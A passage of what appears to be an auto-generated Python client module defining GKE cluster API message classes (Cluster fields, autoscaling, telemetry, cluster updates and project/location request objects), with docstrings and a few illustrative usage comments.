addonsConfig: Configurations for the various addons available to run in
the cluster.
authenticatorGroupsConfig: Configuration controlling RBAC group membership
information.
autoscaling: Cluster-level autoscaling configuration.
binaryAuthorization: Configuration for Binary Authorization.
clusterIpv4Cidr: The IP address range of the container pods in this
cluster, in [CIDR](http://en.wikipedia.org/wiki/Classless_Inter-
Domain_Routing) notation (e.g. `10.96.0.0/14`). Leave blank to have one
automatically chosen or specify a `/14` block in `10.0.0.0/8`.
clusterTelemetry: Telemetry integration for the cluster.
conditions: Which conditions caused the current cluster state.
costManagementConfig: Configuration for the fine-grained cost management
feature.
createTime: [Output only] The time the cluster was created, in
[RFC3339](https://www.ietf.org/rfc/rfc3339.txt) text format.
currentMasterVersion: The current software version of the master endpoint.
currentNodeCount: [Output only] The number of nodes currently in the
cluster. Deprecated. Call Kubernetes API directly to retrieve node
information.
currentNodeVersion: [Output only] Deprecated, use [NodePool.version
](/kubernetes-
engine/docs/reference/rest/v1alpha1/projects.zones.clusters.nodePool)
instead. The current version of the node software components. If they
are currently at multiple versions because they're in the process of
being upgraded, this reflects the minimum version of all nodes.
databaseEncryption: Configuration of etcd encryption.
databaseEncryptionKeyId: Resource name of a CloudKMS key to be used for
the encryption of secrets in etcd. Ex. projects/kms-
project/locations/global/keyRings/ring-1/cryptoKeys/key-1 Deprecated,
use database_encryption instead.
defaultMaxPodsConstraint: The default constraint on the maximum number of
pods that can be run simultaneously on a node in the node pool of this
cluster. Only honored if cluster created with IP Alias support.
description: An optional description of this cluster.
enableKubernetesAlpha: Kubernetes alpha features are enabled on this
cluster. This includes alpha API groups (e.g. v1alpha1) and features
that may not be production ready in the kubernetes version of the master
and nodes. The cluster has no SLA for uptime and master/node upgrades
are disabled. Alpha enabled clusters are automatically deleted thirty
days after creation.
enableTpu: Enable the ability to use Cloud TPUs in this cluster.
endpoint: [Output only] The IP address of this cluster's master endpoint.
The endpoint can be accessed from the internet at
`https://username:password@endpoint/`. See the `masterAuth` property of
this resource for username and password information.
expireTime: [Output only] The time the cluster will be automatically
deleted in [RFC3339](https://www.ietf.org/rfc/rfc3339.txt) text format.
initialClusterVersion: The initial Kubernetes version for this cluster.
Valid versions are those found in validMasterVersions returned by
getServerConfig. The version can be upgraded over time; such upgrades
are reflected in currentMasterVersion and currentNodeVersion. Users may
specify either explicit versions offered by Kubernetes Engine or version
aliases, which have the following behavior: - "latest": picks the
highest valid Kubernetes version - "1.X": picks the highest valid
patch+gke.N patch in the 1.X version - "1.X.Y": picks the highest valid
gke.N patch in the 1.X.Y version - "1.X.Y-gke.N": picks an explicit
Kubernetes version - "","-": picks the default Kubernetes version
initialNodeCount: The number of nodes to create in this cluster. You must
ensure that your Compute Engine <a href="/compute/docs/resource-
quotas">resource quota</a> is sufficient for this number of instances.
You must also have available firewall and routes quota. For requests,
this field should only be used in lieu of a "node_pool" object, since
this configuration (along with the "node_config") will be used to create
a "NodePool" object with an auto-generated name. Do not use this and a
node_pool at the same time. This field is deprecated, use
node_pool.initial_node_count instead.
instanceGroupUrls: Deprecated. Use node_pools.instance_group_urls.
ipAllocationPolicy: Configuration for cluster IP allocation.
labelFingerprint: The fingerprint of the set of labels for this cluster.
legacyAbac: Configuration for the legacy ABAC authorization mode.
location: [Output only] The name of the Google Compute Engine
[zone](/compute/docs/regions-zones/regions-zones#available) or
[region](/compute/docs/regions-zones/regions-zones#available) in which
the cluster resides.
locations: The list of Google Compute Engine
[zones](/compute/docs/zones#available) in which the cluster's nodes
should be located.
loggingService: The logging service the cluster should use to write logs.
Currently available options: * `logging.googleapis.com` - the Google
Cloud Logging service. * `none` - no logs will be exported from the
cluster. * if left as an empty string,`logging.googleapis.com` will be
used.
maintenancePolicy: Configure the maintenance policy for this cluster.
masterAuth: The authentication information for accessing the master
endpoint. If unspecified, the defaults are used: For clusters before
v1.12, if master_auth is unspecified, `username` will be set to "admin",
a random password will be generated, and a client certificate will be
issued.
masterAuthorizedNetworksConfig: The configuration options for master
authorized networks feature.
masterIpv4CidrBlock: The IP prefix in CIDR notation to use for the hosted
master network. This prefix will be used for assigning private IP
addresses to the master or set of masters, as well as the ILB VIP. This
field is deprecated, use private_cluster_config.master_ipv4_cidr_block
instead.
monitoringService: The monitoring service the cluster should use to write
metrics. Currently available options: * `monitoring.googleapis.com` -
the Google Cloud Monitoring service. * `none` - no metrics will be
exported from the cluster. * if left as an empty string,
`monitoring.googleapis.com` will be used.
name: The name of this cluster. The name must be unique within this
project and location (e.g. zone or region), and can be up to 40
characters with the following restrictions: * Lowercase letters,
numbers, and hyphens only. * Must start with a letter. * Must end with a
number or a letter.
network: The name of the Google Compute Engine [network](/compute/docs
/networks-and-firewalls#networks) to which the cluster is connected. If
left unspecified, the `default` network will be used.
networkConfig: Configuration for cluster networking.
networkPolicy: Configuration options for the NetworkPolicy feature.
nodeConfig: Parameters used in creating the cluster's nodes. For requests,
this field should only be used in lieu of a "node_pool" object, since
this configuration (along with the "initial_node_count") will be used to
create a "NodePool" object with an auto-generated name. Do not use this
and a node_pool at the same time. For responses, this field will be
populated with the node configuration of the first node pool. (For
configuration of each node pool, see `node_pool.config`) If
unspecified, the defaults are used. This field is deprecated, use
node_pool.config instead.
nodeIpv4CidrSize: [Output only] The size of the address space on each node
for hosting containers. This is provisioned from within the
`container_ipv4_cidr` range. This field will only be set when cluster is
in route-based network mode.
nodePools: The node pools associated with this cluster. This field should
not be set if "node_config" or "initial_node_count" are specified.
nodeSchedulingStrategy: Defines behaviour of k8s scheduler.
podSecurityPolicyConfig: Configuration for the PodSecurityPolicy feature.
privateCluster: If this is a private cluster setup. Private clusters are
clusters that, by default have no external IP addresses on the nodes and
where nodes and the master communicate over private IP addresses. This
field is deprecated, use private_cluster_config.enable_private_nodes
instead.
privateClusterConfig: Configuration for private cluster.
releaseChannel: Release channel configuration.
resourceLabels: The resource labels for the cluster to use to annotate any
related GCE resources.
resourceUsageExportConfig: Configuration for exporting resource usages.
Resource usage export is disabled when this config unspecified.
resourceVersion: Server-defined resource version (etag).
securityProfile: User selected security profile
selfLink: [Output only] Server-defined URL for the resource.
servicesIpv4Cidr: [Output only] The IP address range of the Kubernetes
services in this cluster, in [CIDR](http://en.wikipedia.org/wiki
/Classless_Inter-Domain_Routing) notation (e.g. `1.2.3.4/29`). Service
addresses are typically put in the last `/16` from the container CIDR.
shieldedNodes: Shielded Nodes configuration.
status: [Output only] The current status of this cluster.
statusMessage: [Output only] Additional information about the current
status of this cluster, if available. Deprecated, use the field
conditions instead.
subnetwork: The name of the Google Compute Engine
[subnetwork](/compute/docs/subnetworks) to which the cluster is
connected. On output this shows the subnetwork ID instead of the name.
tierSettings: Cluster tier settings.
tpuIpv4CidrBlock: [Output only] The IP address range of the Cloud TPUs in
this cluster, in [CIDR](http://en.wikipedia.org/wiki/Classless_Inter-
Domain_Routing) notation (e.g. `1.2.3.4/29`).
verticalPodAutoscaling: Cluster-level Vertical Pod Autoscaling
configuration.
workloadIdentityConfig: Configuration for the use of k8s Service Accounts
in GCP IAM policies.
zone: [Output only] The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field is deprecated, use location instead.
"""
class NodeSchedulingStrategyValueValuesEnum(_messages.Enum):
r"""Defines behaviour of k8s scheduler.
Values:
STRATEGY_UNSPECIFIED: Use default scheduling strategy.
PRIORITIZE_LEAST_UTILIZED: Least utilized nodes will be prioritized by
k8s scheduler.
PRIORITIZE_MEDIUM_UTILIZED: Nodes with medium utilization will be
prioritized by k8s scheduler. This option improves interoperability of
scheduler with cluster autoscaler.
"""
STRATEGY_UNSPECIFIED = 0
PRIORITIZE_LEAST_UTILIZED = 1
PRIORITIZE_MEDIUM_UTILIZED = 2
class StatusValueValuesEnum(_messages.Enum):
r"""[Output only] The current status of this cluster.
Values:
STATUS_UNSPECIFIED: Not set.
PROVISIONING: The PROVISIONING state indicates the cluster is being
created.
RUNNING: The RUNNING state indicates the cluster has been created and is
fully usable.
RECONCILING: The RECONCILING state indicates that some work is actively
being done on the cluster, such as upgrading the master or node
software. Details can be found in the `statusMessage` field.
STOPPING: The STOPPING state indicates the cluster is being deleted.
ERROR: The ERROR state indicates the cluster may be unusable. Details
can be found in the `statusMessage` field.
DEGRADED: The DEGRADED state indicates the cluster requires user action
to restore full functionality. Details can be found in the
`statusMessage` field.
"""
STATUS_UNSPECIFIED = 0
PROVISIONING = 1
RUNNING = 2
RECONCILING = 3
STOPPING = 4
ERROR = 5
DEGRADED = 6
@encoding.MapUnrecognizedFields('additionalProperties')
class ResourceLabelsValue(_messages.Message):
r"""The resource labels for the cluster to use to annotate any related GCE
resources.
Messages:
AdditionalProperty: An additional property for a ResourceLabelsValue
object.
Fields:
additionalProperties: Additional properties of type ResourceLabelsValue
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a ResourceLabelsValue object.
Fields:
key: Name of the additional property.
value: A string attribute.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
additionalProperties = _messages.MessageField('AdditionalProperty', 1, repeated=True)
addonsConfig = _messages.MessageField('AddonsConfig', 1)
authenticatorGroupsConfig = _messages.MessageField('AuthenticatorGroupsConfig', 2)
autoscaling = _messages.MessageField('ClusterAutoscaling', 3)
binaryAuthorization = _messages.MessageField('BinaryAuthorization', 4)
clusterIpv4Cidr = _messages.StringField(5)
clusterTelemetry = _messages.MessageField('ClusterTelemetry', 6)
conditions = _messages.MessageField('StatusCondition', 7, repeated=True)
costManagementConfig = _messages.MessageField('CostManagementConfig', 8)
createTime = _messages.StringField(9)
currentMasterVersion = _messages.StringField(10)
currentNodeCount = _messages.IntegerField(11, variant=_messages.Variant.INT32)
currentNodeVersion = _messages.StringField(12)
databaseEncryption = _messages.MessageField('DatabaseEncryption', 13)
databaseEncryptionKeyId = _messages.StringField(14)
defaultMaxPodsConstraint = _messages.MessageField('MaxPodsConstraint', 15)
description = _messages.StringField(16)
enableKubernetesAlpha = _messages.BooleanField(17)
enableTpu = _messages.BooleanField(18)
endpoint = _messages.StringField(19)
expireTime = _messages.StringField(20)
initialClusterVersion = _messages.StringField(21)
initialNodeCount = _messages.IntegerField(22, variant=_messages.Variant.INT32)
instanceGroupUrls = _messages.StringField(23, repeated=True)
ipAllocationPolicy = _messages.MessageField('IPAllocationPolicy', 24)
labelFingerprint = _messages.StringField(25)
legacyAbac = _messages.MessageField('LegacyAbac', 26)
location = _messages.StringField(27)
locations = _messages.StringField(28, repeated=True)
loggingService = _messages.StringField(29)
maintenancePolicy = _messages.MessageField('MaintenancePolicy', 30)
masterAuth = _messages.MessageField('MasterAuth', 31)
masterAuthorizedNetworksConfig = _messages.MessageField('MasterAuthorizedNetworksConfig', 32)
masterIpv4CidrBlock = _messages.StringField(33)
monitoringService = _messages.StringField(34)
name = _messages.StringField(35)
network = _messages.StringField(36)
networkConfig = _messages.MessageField('NetworkConfig', 37)
networkPolicy = _messages.MessageField('NetworkPolicy', 38)
nodeConfig = _messages.MessageField('NodeConfig', 39)
nodeIpv4CidrSize = _messages.IntegerField(40, variant=_messages.Variant.INT32)
nodePools = _messages.MessageField('NodePool', 41, repeated=True)
nodeSchedulingStrategy = _messages.EnumField('NodeSchedulingStrategyValueValuesEnum', 42)
podSecurityPolicyConfig = _messages.MessageField('PodSecurityPolicyConfig', 43)
privateCluster = _messages.BooleanField(44)
privateClusterConfig = _messages.MessageField('PrivateClusterConfig', 45)
releaseChannel = _messages.MessageField('ReleaseChannel', 46)
resourceLabels = _messages.MessageField('ResourceLabelsValue', 47)
resourceUsageExportConfig = _messages.MessageField('ResourceUsageExportConfig', 48)
resourceVersion = _messages.StringField(49)
securityProfile = _messages.MessageField('SecurityProfile', 50)
selfLink = _messages.StringField(51)
servicesIpv4Cidr = _messages.StringField(52)
shieldedNodes = _messages.MessageField('ShieldedNodes', 53)
status = _messages.EnumField('StatusValueValuesEnum', 54)
statusMessage = _messages.StringField(55)
subnetwork = _messages.StringField(56)
tierSettings = _messages.MessageField('TierSettings', 57)
tpuIpv4CidrBlock = _messages.StringField(58)
verticalPodAutoscaling = _messages.MessageField('VerticalPodAutoscaling', 59)
workloadIdentityConfig = _messages.MessageField('WorkloadIdentityConfig', 60)
zone = _messages.StringField(61)
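# Illustrative only: a minimal Cluster message and a JSON round trip, assuming
# the usual apitools helpers (encoding.MessageToJson / encoding.JsonToMessage)
# imported at the top of this module.
#
#   cluster = Cluster(name='example-cluster', initialNodeCount=3)
#   as_json = encoding.MessageToJson(cluster)
#   restored = encoding.JsonToMessage(Cluster, as_json)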
class ClusterAutoscaling(_messages.Message):
r"""ClusterAutoscaling contains global, per-cluster information required by
Cluster Autoscaler to automatically adjust the size of the cluster and
create/delete node pools based on the current needs.
Enums:
AutoscalingProfileValueValuesEnum: Defines autoscaling behaviour.
Fields:
autoprovisioningLocations: The list of Google Compute Engine
[zones](/compute/docs/zones#available) in which the NodePool's nodes can
be created by NAP.
autoprovisioningNodePoolDefaults: AutoprovisioningNodePoolDefaults
contains defaults for a node pool created by NAP.
autoscalingProfile: Defines autoscaling behaviour.
enableNodeAutoprovisioning: Enables automatic node pool creation and
deletion.
resourceLimits: Contains global constraints regarding minimum and maximum
amount of resources in the cluster.
"""
class AutoscalingProfileValueValuesEnum(_messages.Enum):
r"""Defines autoscaling behaviour.
Values:
PROFILE_UNSPECIFIED: No change to autoscaling configuration.
OPTIMIZE_UTILIZATION: Prioritize optimizing utilization of resources.
BALANCED: Use default (balanced) autoscaling configuration.
"""
PROFILE_UNSPECIFIED = 0
OPTIMIZE_UTILIZATION = 1
BALANCED = 2
autoprovisioningLocations = _messages.StringField(1, repeated=True)
autoprovisioningNodePoolDefaults = _messages.MessageField('AutoprovisioningNodePoolDefaults', 2)
autoscalingProfile = _messages.EnumField('AutoscalingProfileValueValuesEnum', 3)
enableNodeAutoprovisioning = _messages.BooleanField(4)
resourceLimits = _messages.MessageField('ResourceLimit', 5, repeated=True)
class ClusterTelemetry(_messages.Message):
r"""Telemetry integration for the cluster.
Enums:
TypeValueValuesEnum: Type of the integration.
Fields:
type: Type of the integration.
"""
class TypeValueValuesEnum(_messages.Enum):
r"""Type of the integration.
Values:
UNSPECIFIED: Not set.
DISABLED: Monitoring integration is disabled.
ENABLED: Monitoring integration is enabled.
SYSTEM_ONLY: Only system components are monitored and logged.
"""
UNSPECIFIED = 0
DISABLED = 1
ENABLED = 2
SYSTEM_ONLY = 3
type = _messages.EnumField('TypeValueValuesEnum', 1)
class ClusterUpdate(_messages.Message):
r"""ClusterUpdate describes an update to the cluster. Exactly one update can
be applied to a cluster with each request, so at most one field can be
provided.
Fields:
concurrentNodeCount: Controls how many nodes to upgrade in parallel. A
maximum of 20 concurrent nodes is allowed. Deprecated. This feature will
be replaced by an equivalent new feature that gives better control over
concurrency. It is not planned to propagate this field to GA and it will
be eventually removed from the API.
desiredAddonsConfig: Configurations for the various addons available to
run in the cluster.
desiredBinaryAuthorization: The desired configuration options for the
Binary Authorization feature.
desiredCloudNatStatus: The desired status of Cloud NAT for this cluster.
Deprecated: use desired_default_snat_status instead.
desiredClusterAutoscaling: The desired cluster-level autoscaling
configuration.
desiredClusterTelemetry: The desired telemetry integration for the
cluster.
desiredCostManagementConfig: The desired configuration for the fine-
grained cost management feature.
desiredDatabaseEncryption: Configuration of etcd encryption.
desiredDefaultSnatStatus: The desired status of whether to disable default
sNAT for this cluster.
desiredImage: The desired name of the image to use for this node. This is
used to create clusters using a custom image.
desiredImageProject: The project containing the desired image to use for
this node. This is used to create clusters using a custom image.
desiredImageType: The desired image type for the node pool. NOTE: Set the
"desired_node_pool" field as well.
desiredIntraNodeVisibilityConfig: The desired config of Intra-node
visibility.
desiredLocations: The desired list of Google Compute Engine
[zones](/compute/docs/zones#available) in which the cluster's nodes
should be located. Changing the locations a cluster is in will result in
nodes being either created or removed from the cluster, depending on
whether locations are being added or removed. This list must always
include the cluster's primary zone.
desiredLoggingService: The logging service the cluster should use to write
metrics. Currently available options: *
"logging.googleapis.com/kubernetes" - the Google Cloud Logging service
with Kubernetes-native resource model * "logging.googleapis.com" - the
Google Cloud Logging service * "none" - no logs will be exported from
the cluster
desiredMasterAuthorizedNetworksConfig: The desired configuration options
for master authorized networks feature.
desiredMasterVersion: The Kubernetes version to change the master to.
Users may specify either explicit versions offered by Kubernetes Engine
or version aliases, which have the following behavior: - "latest":
picks the highest valid Kubernetes version - "1.X": picks the highest
valid patch+gke.N patch in the 1.X version - "1.X.Y": picks the highest
valid gke.N patch in the 1.X.Y version - "1.X.Y-gke.N": picks an
explicit Kubernetes version - "-": picks the default Kubernetes version
desiredMonitoringService: The monitoring service the cluster should use to
write metrics. Currently available options: *
"monitoring.googleapis.com/kubernetes" - the Google Cloud Monitoring
service with Kubernetes-native resource model *
"monitoring.googleapis.com" - the Google Cloud Monitoring service *
"none" - no metrics will be exported from the cluster
desiredNodePoolAutoscaling: Autoscaler configuration for the node pool
specified in desired_node_pool_id. If there is only one pool in the
cluster and desired_node_pool_id is not provided then the change applies
to that single node pool.
desiredNodePoolId: The node pool to be upgraded. This field is mandatory
if "desired_node_version", "desired_image_family",
"desired_node_pool_autoscaling", or "desired_workload_metadata_config"
is specified and there is more than one node pool on the cluster.
desiredNodeVersion: The Kubernetes version to change the nodes to
(typically an upgrade). Users may specify either explicit versions
offered by Kubernetes Engine or version aliases, which have the
following behavior: - "latest": picks the highest valid Kubernetes
version - "1.X": picks the highest valid patch+gke.N patch in the 1.X
version - "1.X.Y": picks the highest valid gke.N patch in the 1.X.Y
version - "1.X.Y-gke.N": picks an explicit Kubernetes version - "-":
picks the Kubernetes master version
desiredPodSecurityPolicyConfig: The desired configuration options for the
PodSecurityPolicy feature.
desiredPrivateClusterConfig: The desired private cluster configuration.
desiredPrivateIpv6Access: The desired status of Private IPv6 access for
this cluster.
desiredReleaseChannel: The desired release channel configuration.
desiredResourceUsageExportConfig: The desired configuration for exporting
resource usage.
desiredShieldedNodes: Configuration for Shielded Nodes.
desiredVerticalPodAutoscaling: Cluster-level Vertical Pod Autoscaling
configuration.
desiredWorkloadIdentityConfig: Configuration for Workload Identity.
privateClusterConfig: The desired private cluster configuration.
securityProfile: User may change security profile during update
"""
concurrentNodeCount = _messages.IntegerField(1, variant=_messages.Variant.INT32)
desiredAddonsConfig = _messages.MessageField('AddonsConfig', 2)
desiredBinaryAuthorization = _messages.MessageField('BinaryAuthorization', 3)
desiredCloudNatStatus = _messages.MessageField('CloudNatStatus', 4)
desiredClusterAutoscaling = _messages.MessageField('ClusterAutoscaling', 5)
desiredClusterTelemetry = _messages.MessageField('ClusterTelemetry', 6)
desiredCostManagementConfig = _messages.MessageField('CostManagementConfig', 7)
desiredDatabaseEncryption = _messages.MessageField('DatabaseEncryption', 8)
desiredDefaultSnatStatus = _messages.MessageField('DefaultSnatStatus', 9)
desiredImage = _messages.StringField(10)
desiredImageProject = _messages.StringField(11)
desiredImageType = _messages.StringField(12)
desiredIntraNodeVisibilityConfig = _messages.MessageField('IntraNodeVisibilityConfig', 13)
desiredLocations = _messages.StringField(14, repeated=True)
desiredLoggingService = _messages.StringField(15)
desiredMasterAuthorizedNetworksConfig = _messages.MessageField('MasterAuthorizedNetworksConfig', 16)
desiredMasterVersion = _messages.StringField(17)
desiredMonitoringService = _messages.StringField(18)
desiredNodePoolAutoscaling = _messages.MessageField('NodePoolAutoscaling', 19)
desiredNodePoolId = _messages.StringField(20)
desiredNodeVersion = _messages.StringField(21)
desiredPodSecurityPolicyConfig = _messages.MessageField('PodSecurityPolicyConfig', 22)
desiredPrivateClusterConfig = _messages.MessageField('PrivateClusterConfig', 23)
desiredPrivateIpv6Access = _messages.MessageField('PrivateIPv6Status', 24)
desiredReleaseChannel = _messages.MessageField('ReleaseChannel', 25)
desiredResourceUsageExportConfig = _messages.MessageField('ResourceUsageExportConfig', 26)
desiredShieldedNodes = _messages.MessageField('ShieldedNodes', 27)
desiredVerticalPodAutoscaling = _messages.MessageField('VerticalPodAutoscaling', 28)
desiredWorkloadIdentityConfig = _messages.MessageField('WorkloadIdentityConfig', 29)
privateClusterConfig = _messages.MessageField('PrivateClusterConfig', 30)
securityProfile = _messages.MessageField('SecurityProfile', 31)
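# Illustrative only: per the docstring above, a ClusterUpdate should carry a
# single desired change, e.g. upgrading the master to the latest valid version:
#
#   update = ClusterUpdate(desiredMasterVersion='latest')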
class CompleteIPRotationRequest(_messages.Message):
r"""CompleteIPRotationRequest moves the cluster master back into single-IP
mode.
Fields:
clusterId: Deprecated. The name of the cluster. This field has been
deprecated and replaced by the name field.
name: The name (project, location, cluster id) of the cluster to complete
IP rotation. Specified in the format
'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project
number](https://developers.google.com/console/help/new/#projectnumber).
This field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
name = _messages.StringField(2)
projectId = _messages.StringField(3)
zone = _messages.StringField(4)
class ConfigConnectorConfig(_messages.Message):
r"""Configuration options for the Config Connector add-on.
Fields:
    enabled: Whether Config Connector is enabled for this cluster.
"""
enabled = _messages.BooleanField(1)
class ConsumptionMeteringConfig(_messages.Message):
r"""Parameters for controlling consumption metering.
Fields:
enabled: Whether to enable consumption metering for this cluster. If
enabled, a second BigQuery table will be created to hold resource
consumption records.
"""
enabled = _messages.BooleanField(1)
class ContainerProjectsAggregatedUsableSubnetworksListRequest(_messages.Message):
r"""A ContainerProjectsAggregatedUsableSubnetworksListRequest object.
Fields:
filter: Filtering currently only supports equality on the networkProjectId
and must be in the form: "networkProjectId=[PROJECTID]", where
`networkProjectId` is the project which owns the listed subnetworks.
This defaults to the parent project ID.
pageSize: The max number of results per page that should be returned. If
the number of available results is larger than `page_size`, a
`next_page_token` is returned which can be used to get the next page of
results in subsequent requests. Acceptable values are 0 to 500,
inclusive. (Default: 500)
pageToken: Specifies a page token to use. Set this to the next_page_token
returned by previous list requests to get the next page of results.
parent: The parent project where subnetworks are usable. Specified in the
format 'projects/*'.
"""
filter = _messages.StringField(1)
pageSize = _messages.IntegerField(2, variant=_messages.Variant.INT32)
pageToken = _messages.StringField(3)
parent = _messages.StringField(4, required=True)
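# Illustrative only: listing usable subnetworks owned by a hypothetical host
# project, using the 'networkProjectId=[PROJECTID]' filter syntax described in
# the docstring above:
#
#   req = ContainerProjectsAggregatedUsableSubnetworksListRequest(
#       parent='projects/my-project',
#       filter='networkProjectId=my-host-project',
#       pageSize=100)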
class ContainerProjectsLocationsClustersDeleteRequest(_messages.Message):
r"""A ContainerProjectsLocationsClustersDeleteRequest object.
Fields:
clusterId: Deprecated. The name of the cluster to delete. This field has
been deprecated and replaced by the name field.
name: The name (project, location, cluster) of the cluster to delete.
Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
name = _messages.StringField(2, required=True)
projectId = _messages.StringField(3)
zone = _messages.StringField(4)
class ContainerProjectsLocationsClustersGetJwksRequest(_messages.Message):
r"""A ContainerProjectsLocationsClustersGetJwksRequest object.
Fields:
parent: The cluster (project, location, cluster id) to get keys for.
Specified in the format 'projects/*/locations/*/clusters/*'.
"""
parent = _messages.StringField(1, required=True)
class ContainerProjectsLocationsClustersGetRequest(_messages.Message):
r"""A ContainerProjectsLocationsClustersGetRequest object.
Fields:
clusterId: Deprecated. The name of the cluster to retrieve. This field has
been deprecated and replaced by the name field.
name: The name (project, location, cluster) of the cluster to retrieve.
Specified in the format 'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
name = _messages.StringField(2, required=True)
projectId = _messages.StringField(3)
zone = _messages.StringField(4)
class ContainerProjectsLocationsClustersListRequest(_messages.Message):
r"""A ContainerProjectsLocationsClustersListRequest object.
Fields:
parent: The parent (project and location) where the clusters will be
listed. Specified in the format 'projects/*/locations/*'. Location "-"
matches all zones and all regions.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the parent field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides, or
"-" for all zones. This field has been deprecated and replaced by the
parent field.
"""
parent = _messages.StringField(1, required=True)
projectId = _messages.StringField(2)
zone = _messages.StringField(3)
class ContainerProjectsLocationsClustersNodePoolsDeleteRequest(_messages.Message):
r"""A ContainerProjectsLocationsClustersNodePoolsDeleteRequest object.
Fields:
    clusterId: Deprecated. The name of the cluster. This field has been
deprecated and replaced by the name field.
name: The name (project, location, cluster, node pool id) of the node pool
to delete. Specified in the format
'projects/*/locations/*/clusters/*/nodePools/*'.
nodePoolId: Deprecated. The name of the node pool to delete. This field
has been deprecated and replaced by the name field.
projectId: Deprecated. The Google Developers Console [project ID or
project
number](https://developers.google.com/console/help/new/#projectnumber).
This field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
name = _messages.StringField(2, required=True)
nodePoolId = _messages.StringField(3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
class ContainerProjectsLocationsClustersNodePoolsGetRequest(_messages.Message):
r"""A ContainerProjectsLocationsClustersNodePoolsGetRequest object.
Fields:
clusterId: Deprecated. The name of the cluster. This field has been
deprecated and replaced by the name field.
name: The name (project, location, cluster, node pool id) of the node pool
to get. Specified in the format
'projects/*/locations/*/clusters/*/nodePools/*'.
nodePoolId: Deprecated. The name of the node pool. This field has been
deprecated and replaced by the name field.
projectId: Deprecated. The Google Developers Console [project ID or
project
number](https://developers.google.com/console/help/new/#projectnumber).
This field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
clusterId = _messages.StringField(1)
name = _messages.StringField(2, required=True)
nodePoolId = _messages.StringField(3)
projectId = _messages.StringField(4)
zone = _messages.StringField(5)
class ContainerProjectsLocationsClustersNodePoolsListRequest(_messages.Message):
r"""A ContainerProjectsLocationsClustersNodePoolsListRequest object.
Fields:
clusterId: Deprecated. The name of the cluster. This field has been
deprecated and replaced by the parent field.
parent: The parent (project, location, cluster id) where the node pools
will be listed. Specified in the format
'projects/*/locations/*/clusters/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project
number](https://developers.google.com/console/help/new/#projectnumber).
This field has been deprecated and replaced by the parent field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the parent field.
"""
clusterId = _messages.StringField(1)
parent = _messages.StringField(2, required=True)
projectId = _messages.StringField(3)
zone = _messages.StringField(4)
class ContainerProjectsLocationsClustersWellKnownGetOpenidConfigurationRequest(_messages.Message):
r"""A
ContainerProjectsLocationsClustersWellKnownGetOpenidConfigurationRequest
object.
Fields:
parent: The cluster (project, location, cluster id) to get the discovery
document for. Specified in the format
'projects/*/locations/*/clusters/*'.
"""
parent = _messages.StringField(1, required=True)
class ContainerProjectsLocationsGetServerConfigRequest(_messages.Message):
r"""A ContainerProjectsLocationsGetServerConfigRequest object.
Fields:
name: The name (project and location) of the server config to get,
specified in the format 'projects/*/locations/*'.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) to return operations for. This
field has been deprecated and replaced by the name field.
"""
name = _messages.StringField(1, required=True)
projectId = _messages.StringField(2)
zone = _messages.StringField(3)
class ContainerProjectsLocationsListRequest(_messages.Message):
r"""A ContainerProjectsLocationsListRequest object.
Fields:
parent: Contains the name of the resource requested. Specified in the
format 'projects/*'.
"""
parent = _messages.StringField(1, required=True)
class ContainerProjectsLocationsOperationsGetRequest(_messages.Message):
r"""A ContainerProjectsLocationsOperationsGetRequest object.
Fields:
name: The name (project, location, operation id) of the operation to get.
Specified in the format 'projects/*/locations/*/operations/*'.
operationId: Deprecated. The server-assigned `name` of the operation. This
field has been deprecated and replaced by the name field.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the name field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) in which the cluster resides. This
field has been deprecated and replaced by the name field.
"""
name = _messages.StringField(1, required=True)
operationId = _messages.StringField(2)
projectId = _messages.StringField(3)
zone = _messages.StringField(4)
class ContainerProjectsLocationsOperationsListRequest(_messages.Message):
r"""A ContainerProjectsLocationsOperationsListRequest object.
Fields:
parent: The parent (project and location) where the operations will be
listed. Specified in the format 'projects/*/locations/*'. Location "-"
matches all zones and all regions.
projectId: Deprecated. The Google Developers Console [project ID or
project number](https://support.google.com/cloud/answer/6158840). This
field has been deprecated and replaced by the parent field.
zone: Deprecated. The name of the Google Compute Engine
[zone](/compute/docs/zones#available) to return operations for, or `-`
for all zones. This field has been deprecated and replaced by the parent
field.
"""
parent = _messages.StringField(1, required=True)
projectId = _messages.StringField(2)
zone = _messages.StringField(3)
class ContainerProjectsZonesClustersDeleteRequest(_messages.Message):
